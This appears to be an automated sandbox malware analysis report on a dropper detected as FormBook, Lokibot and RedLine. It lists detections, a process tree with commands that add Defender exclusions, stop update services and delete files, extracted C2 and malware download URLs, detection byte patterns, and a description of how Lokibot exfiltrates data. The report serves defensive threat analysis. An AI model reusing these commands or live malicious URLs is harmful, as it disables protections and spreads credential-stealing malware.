Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New_Text_Document.exe

Overview

General Information

Sample Name:New_Text_Document.exe
Analysis ID:1332496
MD5:a239a27c2169af388d4f5be6b52f272c
SHA1:0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256:98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
Tags:exeurls-haus-scrapping
Infos:

Detection

FormBook, Lokibot, NSISDropper, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected NSISDropper
Yara detected AntiVM3
Sigma detected: Stop multiple services
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Yara detected aPLib compressed binary
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Sample has a suspicious name (potential lure to open the executable)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses powercfg.exe to modify the power settings
Hides threads from debuggers
Sample uses process hollowing technique
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Modifies the hosts file
Changes security center settings (notifications, updates, antivirus, firewall)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
PE file overlay found
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Queries disk information (often used to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • New_Text_Document.exe (PID: 7076 cmdline: C:\Users\user\Desktop\New_Text_Document.exe MD5: A239A27C2169AF388D4F5BE6B52F272C)
    • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • audiodgse.exe (PID: 2352 cmdline: "C:\Users\user\Desktop\a\audiodgse.exe" MD5: 699B84A4A3C73A574BC51F461AD209DB)
      • audiodgse.exe (PID: 5968 cmdline: C:\Users\user\Desktop\a\audiodgse.exe MD5: 699B84A4A3C73A574BC51F461AD209DB)
        • LkeNkIcFYvnikmw.exe (PID: 644 cmdline: "C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • poqexec.exe (PID: 2760 cmdline: C:\Windows\SysWOW64\poqexec.exe MD5: 3D570C0E68734A7B81BE47313E442974)
          • raserver.exe (PID: 2928 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: D1053D114847677185F248FF98C3F255)
            • LkeNkIcFYvnikmw.exe (PID: 5628 cmdline: "C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • sbinzx.exe (PID: 6748 cmdline: "C:\Users\user\Desktop\a\sbinzx.exe" MD5: FC8B3A3005CDC80CE19AF33A57010FA8)
      • sbinzx.exe (PID: 6976 cmdline: C:\Users\user\Desktop\a\sbinzx.exe MD5: FC8B3A3005CDC80CE19AF33A57010FA8)
      • sbinzx.exe (PID: 6356 cmdline: C:\Users\user\Desktop\a\sbinzx.exe MD5: FC8B3A3005CDC80CE19AF33A57010FA8)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • colorcpl.exe (PID: 1792 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
            • cmd.exe (PID: 7448 cmdline: /c del "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4696 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • raserver.exe (PID: 7300 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: D1053D114847677185F248FF98C3F255)
            • cmd.exe (PID: 7480 cmdline: /c del "C:\Users\user\Desktop\a\sbinzx.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7752 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 7792 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • sc.exe (PID: 7812 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • sc.exe (PID: 7836 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • sc.exe (PID: 7860 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • sc.exe (PID: 7888 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • cmd.exe (PID: 7904 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 8036 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • schtasks.exe (PID: 7956 cmdline: C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • autolog.exe (PID: 3696 cmdline: "C:\Users\user\Desktop\a\autolog.exe" MD5: 5A7848FDBC0CA7BAB05257E730497197)
      • pznhcda.exe (PID: 2692 cmdline: "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe" MD5: 43100AE87F6E6802E3D65F8C79BA030B)
        • pznhcda.exe (PID: 6160 cmdline: C:\Users\user~1\AppData\Local\Temp\pznhcda.exe MD5: 43100AE87F6E6802E3D65F8C79BA030B)
    • setup.exe (PID: 3504 cmdline: "C:\Users\user\Desktop\a\setup.exe" MD5: 8A22C4B4E8B911A51322DFD78FE799C4)
  • svchost.exe (PID: 6592 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 664 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 484 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 4460 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 4296 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3740 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2868 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6764 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://sempersim.su/a16/fre.php"]}
{"C2 list": ["www.sarthaksrishticreation.com/sy22/"], "decoy": ["vinteligencia.com", "displayfridges.fun", "completetip.com", "giallozafferrano.com", "jizihao1.com", "mysticheightstrail.com", "fourseasonslb.com", "kjnala.shop", "mosiacwall.com", "vandistreet.com", "gracefullytouchedartistry.com", "hbiwhwr.shop", "mfmz.net", "hrmbrillianz.com", "funwarsztat.com", "polewithcandy.com", "ourrajasthan.com", "wilhouettteamerica.com", "johnnystintshop.com", "asgnelwin.com", "alcmcyu.com", "thwmlohr.click", "gypseascuba.com", "mysonisgaythemovie.com", "sunriseautostorellc.com", "fuhouse.link", "motorcycleglassesshop.com", "vaskaworldairways.com", "qixservice.online", "b2b-scaling.com", "03ss.vip", "trishpintar.com", "gk84.com", "omclaval.com", "emeeycarwash.com", "wb7mnp.com", "kimgj.com", "278809.com", "summitstracecolumbus.com", "dryadai.com", "vistcreative.com", "weoliveorder.com", "kwamitikki.com", "cjk66.online", "travisline.pro", "mercardosupltda.shop", "sunspotplumbing.com", "podplugca.com", "leontellez.com", "fzturf.com", "docomo-mobileconsulting.com", "apneabirmingham.info", "rollesgraciejiujitsu.com", "sx15k.com", "kebobcapital.com", "91967.net", "claudiaduverglas.com", "zhperviepixie.com", "oliwas.xyz", "flowersinspace.tech", "uadmxqby.click", "greatbaitusa.com", "drpenawaraircondhargarahmah.com", "sofbks.top"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapWindows_Trojan_Lokibot_1f885282unknownunknown
      • 0x13b4948:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
      dump.pcapWindows_Trojan_Lokibot_0f421617unknownunknown
      • 0x13a03c3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
      dump.pcapLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
      • 0x13affbb:$des3: 68 03 66 00 00
      • 0x13b4948:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
      • 0x13b4a14:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\Desktop\a\kung.exeJoeSecurity_LokibotYara detected LokibotJoe Security
        C:\Users\user\Desktop\a\kung.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          C:\Users\user\Desktop\a\kung.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            C:\Users\user\Desktop\a\kung.exeWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            C:\Users\user\Desktop\a\kung.exeWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
              00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
                • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
                • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
                • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
                • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
                00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
                • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
                • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
                • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
                • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
                • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
                • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
                • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
                • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
                • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
                00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
                • 0x18849:$sqlite3step: 68 34 1C 7B E1
                • 0x1895c:$sqlite3step: 68 34 1C 7B E1
                • 0x18878:$sqlite3text: 68 38 2A 90 C5
                • 0x1899d:$sqlite3text: 68 38 2A 90 C5
                • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
                • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
                Click to see the 88 entries
                SourceRuleDescriptionAuthorStrings
                16.2.pznhcda.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
                  16.2.pznhcda.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    16.2.pznhcda.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
                    • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
                    • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
                    • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
                    • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
                    16.2.pznhcda.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
                    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                    • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                    • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
                    • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
                    • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
                    • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
                    • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
                    • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
                    • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
                    • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
                    • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
                    16.2.pznhcda.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
                    • 0x17a49:$sqlite3step: 68 34 1C 7B E1
                    • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
                    • 0x17a78:$sqlite3text: 68 38 2A 90 C5
                    • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
                    • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
                    • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
                    Click to see the 36 entries

                    Operating System Destruction

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7752, ProcessName: cmd.exe
                    Timestamp:91.227.16.22192.168.2.780497552018572 10/26/23-09:47:51.569829
                    SID:2018572
                    Source Port:80
                    Destination Port:49755
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.750.116.112.4349723802031412 10/26/23-09:46:38.811863
                    SID:2031412
                    Source Port:49723
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:77.91.124.86192.168.2.719084497582043234 10/26/23-09:47:52.932361
                    SID:2043234
                    Source Port:19084
                    Destination Port:49758
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.73.33.130.19049748802031412 10/26/23-09:47:39.041488
                    SID:2031412
                    Source Port:49748
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.7103.120.80.11149734802031412 10/26/23-09:47:00.169360
                    SID:2031412
                    Source Port:49734
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.799.83.196.7149739802031412 10/26/23-09:47:14.376373
                    SID:2031412
                    Source Port:49739
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.771.33.141.24849731802031412 10/26/23-09:46:53.938086
                    SID:2031412
                    Source Port:49731
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.723.227.38.7449741802031412 10/26/23-09:47:19.088369
                    SID:2031412
                    Source Port:49741
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.777.91.124.8649758190842043231 10/26/23-09:47:52.728577
                    SID:2043231
                    Source Port:49758
                    Destination Port:19084
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.777.91.124.8649758190842046045 10/26/23-09:47:52.728577
                    SID:2046045
                    Source Port:49758
                    Destination Port:19084
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://94.53.120.109/dusers.exeAvira URL Cloud: Label: malware
                    Source: http://216.244.203.134:42107/bin.shAvira URL Cloud: Label: malware
                    Source: https://smartphoodapp.com/miner.exeAvira URL Cloud: Label: malware
                    Source: http://211.199.69.236:59418/.iAvira URL Cloud: Label: malware
                    Source: http://185.161.248.78/3589a2a406ead5ea/msvcp140.dllAvira URL Cloud: Label: malware
                    Source: http://203.204.235.113:44940/.iAvira URL Cloud: Label: malware
                    Source: http://220.117.35.167:47616/.iAvira URL Cloud: Label: malware
                    Source: http://116.212.142.69:36319/Mozi.mAvira URL Cloud: Label: malware
                    Source: http://211.230.226.111:39603/.iAvira URL Cloud: Label: malware
                    Source: http://201.150.173.84:53974/Mozi.mAvira URL Cloud: Label: malware
                    Source: http://41.32.168.51:16133/.iAvira URL Cloud: Label: malware
                    Source: http://109.235.189.104:7992/.iAvira URL Cloud: Label: malware
                    Source: https://vidaviajesperu.com/download/File_pass1234.7zAvira URL Cloud: Label: malware
                    Source: https://wtools.io/code/dl/bPnOAvira URL Cloud: Label: malware
                    Source: http://123.241.15.110:56344/.iAvira URL Cloud: Label: malware
                    Source: http://98.227.194.36:11110/.iAvira URL Cloud: Label: malware
                    Source: https://quizbn.com/download/File_pass1234.7zAvira URL Cloud: Label: malware
                    Source: http://61.57.95.40:11177/.iAvira URL Cloud: Label: malware
                    Source: http://brknarikan.com/upload/Statement000487291018.xlsbAvira URL Cloud: Label: malware
                    Source: http://95.214.24.244/TORRENT-SPAM/Kbdxdxwj-1.exeAvira URL Cloud: Label: malware
                    Source: http://176.97.210.211/ppcAvira URL Cloud: Label: malware
                    Source: https://khanz.co.nz/ieea/Avira URL Cloud: Label: malware
                    Source: http://122.100.175.200:27429/.iAvira URL Cloud: Label: malware
                    Source: http://182.216.221.251:52881/.iAvira URL Cloud: Label: malware
                    Source: http://64.79.79.180/m68kAvira URL Cloud: Label: malware
                    Source: http://182.235.147.107:22649/.iAvira URL Cloud: Label: malware
                    Source: http://62.169.235.215:17145/.iAvira URL Cloud: Label: malware
                    Source: http://sterlingfundinginc.com/wp-conteAvira URL Cloud: Label: malware
                    Source: http://103.178.229.177/skyljne.x86_64Avira URL Cloud: Label: malware
                    Source: http://112.78.42.90:29620/.iAvira URL Cloud: Label: malware
                    Source: http://181.129.137.29:32770/.iAvira URL Cloud: Label: malware
                    Source: http://112.239.99.27:37295/Mozi.mAvira URL Cloud: Label: malware
                    Source: https://trtmyanmar.com/wp-content/plugins/yjmqxmidki/a/hyehwggs.ps1Avira URL Cloud: Label: malware
                    Source: http://88.225.222.128:14802/.iAvira URL Cloud: Label: malware
                    Source: http://35.230.66.101/hydro.mpslAvira URL Cloud: Label: malware
                    Source: http://109.99.116.230:42226/.iAvira URL Cloud: Label: malware
                    Source: https://karapinarhaber.com.tr/wp-content/download/File_pass1234.7zAvira URL Cloud: Label: phishing
                    Source: http://108.2.158.69:36459/.iAvira URL Cloud: Label: malware
                    Source: http://critlcalriver.com/site-assets/Rules.docAvira URL Cloud: Label: malware
                    Source: http://2.202.11.68:48386/.iAvira URL Cloud: Label: malware
                    Source: http://45.81.39.10/bins/scorp.mipsAvira URL Cloud: Label: malware
                    Source: https://pns.org.pk/crt/xeAvira URL Cloud: Label: malware
                    Source: http://89.45.182.152:6906/.iAvira URL Cloud: Label: malware
                    Source: http://31.220.3.140/bins/la.bot.armAvira URL Cloud: Label: malware
                    Source: http://90.176.171.4:7682/.iAvira URL Cloud: Label: malware
